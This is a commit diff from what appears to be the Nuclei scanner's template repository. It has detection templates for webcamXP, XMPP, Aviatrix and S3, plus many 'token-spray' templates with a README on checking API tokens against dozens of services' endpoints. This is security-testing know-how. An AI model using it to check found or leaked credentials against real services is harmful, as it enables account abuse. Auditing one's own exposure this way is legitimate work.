author: dhiyaneshDK
severity: info
reference: https://www.exploit-db.com/ghdb/7448
tags: iot
metadata:
shodan: 'http.title:"webcamXP 5"'
requests:
- method: GET
path:
- '{{BaseURL}}/home.html'
matchers-condition: and
matchers:
- type: word
words:
- '<title>webcamXP 5</title>'
- type: status
status:
- 200

View File

@ -14,6 +14,7 @@ requests:
Host: {{Hostname}}
Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=
threads: 50
payloads:
path:
- /
@ -63,9 +64,6 @@ requests:
- /webticket/webticketservice.svcabs/
- /adfs/services/trust/2005/windowstransport
attack: sniper
threads: 50
matchers-condition: and
matchers:
- type: dsl

View File

@ -16,6 +16,7 @@ requests:
- '{{BaseURL}}/gallery/zp-core/setup/index.php'
- '{{BaseURL}}/zp-core/setup/index.php'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word

View File

@ -0,0 +1,24 @@
id: detect-jabber-xmpp
info:
name: Detects Jabber XMPP Instance
author: geeknik
severity: info
description: Jabber is the original name of the Extensible Messaging and Presence Protocol (XMPP), the open technology for instant messaging and presence.
reference: https://datatracker.ietf.org/doc/html/rfc6120
tags: network,jabber,xmpp
network:
- inputs:
- data: "a\n"
host:
- "{{Hostname}}"
- "{{Hostname}}:5222"
matchers:
- type: word
words:
- "stream:stream xmlns:stream"
- "stream:error xmlns:stream"
condition: or

View File

@ -5,6 +5,8 @@ info:
author: pikpikcu,philippedelteil
severity: info
tags: tech,aviatrix
metadata:
shodan-query: http.title:"AviatrixController", http.title:"Aviatrix Cloud Controller"
requests:
- method: GET

View File

@ -18,7 +18,7 @@ requests:
- contains(tolower(all_headers), 'x-amz-bucket')
- contains(tolower(all_headers), 'x-amz-request')
- contains(tolower(all_headers), 'x-amz-id')
- contains(tolower(all_headers), 'AmazonS3')
- contains(tolower(all_headers), 'amazons3')
part: header
condition: or

View File

@ -1,15 +1,19 @@
## About
This directory holds templates that have static API URL endpoints. Use these to test an API token against many API service endpoints. By providing token input using flag, Nuclei will test the token against all known API endpoints within the API templates, and return any successful results. By incorporating API checks as Nuclei Templates, users can test API keys that have no context (i.e., API keys that do not indicate for which API endpoint they are meant).
## Usage
You do not need to specify an input URL to test a token against these API endpoints, as the API endpoints have static URLs. However, Nuclei requires an input (specified via `-u` for individual URLs or `-l` for a file containing URLs). Because of this requirement, we simply pass in `-u "null"`. Each template in the `token-spray` directory assumes the input API token will be provided using CLI `var` flag.
```bash
# Run Nuclei specifying all the api templates:
token-spray are **self-contained** template and does not requires URLs as input as the API endpoints have static URLs predefined in the template. Each template in the `token-spray` directory assumes the input API token/s will be provided using CLI `var` flag.
nuclei -u null -t token-spray/ -var token=thisIsMySecretTokenThatIWantToTest
```console
# Running token-spray templates against a single token to test
nuclei -t token-spray/ -var token=random-token-to-test
# Running token-spray templates against a file containing multiple new line delimited tokens
nuclei -t token-spray/ -var token=file_with_tokens.txt
```
## Credits
These API testing templates were inspired by the [streaak/keyhacks](https://github.com/streaak/keyhacks) repository. The Bishop Fox [Continuous Attack Surface Testing (CAST)](https://www.bishopfox.com/continuous-attack-surface-testing/how-cast-works/) team created additional API templates for testing API keys uncovered during investigations. You are welcome to add new templates based on the existing format to cover more APIs.
These API testing templates were inspired by the [streaak/keyhacks](https://github.com/streaak/keyhacks) repository. The Bishop Fox [Continuous Attack Surface Testing (CAST)](https://www.bishopfox.com/continuous-attack-surface-testing/how-cast-works/) team created additional API templates for testing API keys uncovered during investigations. You are welcome to add new templates based on the existing format to cover more APIs.

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,asana
self-contained: true
requests:
- method: GET
path:
@ -16,6 +17,6 @@ requests:
matchers:
- type: status
negative: true
status:
- 401
negative: true

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,bing,maps,bingmaps
self-contained: true
requests:
- method: GET
path:

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,bitly
self-contained: true
requests:
- method: GET
path:

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,buildkite
self-contained: true
requests:
- method: GET
path:

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,buttercms
self-contained: true
requests:
- method: GET
path:

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,calendly
self-contained: true
requests:
- method: GET
path:

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,circle,circleci
self-contained: true
requests:
- method: GET
path:

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,deviantart
self-contained: true
requests:
- method: POST
path:

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,dropbox
self-contained: true
requests:
- method: POST
path:

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,github
self-contained: true
requests:
- method: GET
path:

View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,autocomplete
self-contained: true
requests:
- method: GET
path:

View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,search
self-contained: true
requests:
- method: GET
path:

View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,directions
self-contained: true
requests:
- method: GET
path:

View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,elevation
self-contained: true
requests:
- method: GET
path:

View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,fcm,firebase,cloud,messaging
self-contained: true
requests:
- method: POST
path:

View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,find,text
self-contained: true
requests:
- method: GET
path:

View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,distance,matrix
self-contained: true
requests:
- method: GET
path:

View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,geocode
self-contained: true
requests:
- method: GET
path:

View File

@ -6,19 +6,21 @@ info:
severity: info
tags: token-spray,google,geolocation
self-contained: true
requests:
- method: GET
path:
- "https://www.googleapis.com/geolocation/v1/geolocate?key={{token}}"
matchers-condition: and
matchers-condition: and
matchers:
- type: word
part: body
negative: true
words:
- 'error'
negative: true
- type: status
negative: true
status:
- 404
negative: true

View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,maps,embed
self-contained: true
requests:
- method: GET
path:

View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,maps,embed
self-contained: true
requests:
- method: GET
path:

View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,search,nearby
self-contained: true
requests:
- method: GET
path:

View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,roads
self-contained: true
requests:
- method: GET
path:

View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,place,details
self-contained: true
requests:
- method: GET
path:

View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,places,photo
self-contained: true
requests:
- method: GET
path:

View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,playable,locations
self-contained: true
requests:
- method: GET
path:

View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,route
self-contained: true
requests:
- method: GET
path:

View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,speed,limit
self-contained: true
requests:
- method: GET
path:

View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,maps
self-contained: true
requests:
- method: GET
path:

View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,streetview
self-contained: true
requests:
- method: GET
path:

View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,timezone
self-contained: true
requests:
- method: GET
path:

View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,search,places,text
self-contained: true
requests:
- method: GET
path:
@ -14,6 +15,6 @@ requests:
matchers:
- type: word
part: body
negative: true
words:
- 'error_message'
negative: true

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,heroku
self-contained: true
requests:
- method: POST
path:
@ -17,9 +18,9 @@ requests:
matchers:
- type: status
condition: or
status:
- 200
- 201
- 202
- 206
condition: or

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,hubspot
self-contained: true
requests:
- method: GET
path:

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,instagram,graph
self-contained: true
requests:
- method: GET
path:

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,ipstack
self-contained: true
requests:
- method: GET
path:

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,iterable
self-contained: true
requests:
- method: GET
path:

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,jumpcloud
self-contained: true
requests:
- method: GET
path:

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,lokalise
self-contained: true
requests:
- method: GET
path:

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,loqate
self-contained: true
requests:
- method: GET
path:

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,mailchimp
self-contained: true
network:
- inputs:
- data: "AUTH PLAIN {{base64(hex_decode('00')+'apikey'+hex_decode('00')+token)}}\r\n"

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,mailgun
self-contained: true
requests:
- method: GET
path:

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,mapbox
self-contained: true
requests:
- method: GET
path:

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,newrelic,nerdgraph
self-contained: true
requests:
- method: POST
path:

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,node,npm,package,manager
self-contained: true
requests:
- method: GET
path:

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,weather,openweather
self-contained: true
requests:
- method: GET
path:

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,pagerduty
self-contained: true
requests:
- method: GET
path:

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,pendo
self-contained: true
requests:
- method: GET
path:

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,pivotaltracker
self-contained: true
requests:
- method: GET
path:

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,postmark
self-contained: true
requests:
- method: GET
path:

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,sendgrid
self-contained: true
network:
- inputs:
- data: "ehlo\r\n"

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,slack
self-contained: true
requests:
- method: POST
path:

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,sonarcloud
self-contained: true
requests:
- method: GET
path:

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,spotify
self-contained: true
requests:
- method: GET
path:

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,square
self-contained: true
requests:
- method: GET
path:

Some files were not shown because too many files have changed in this diff Show More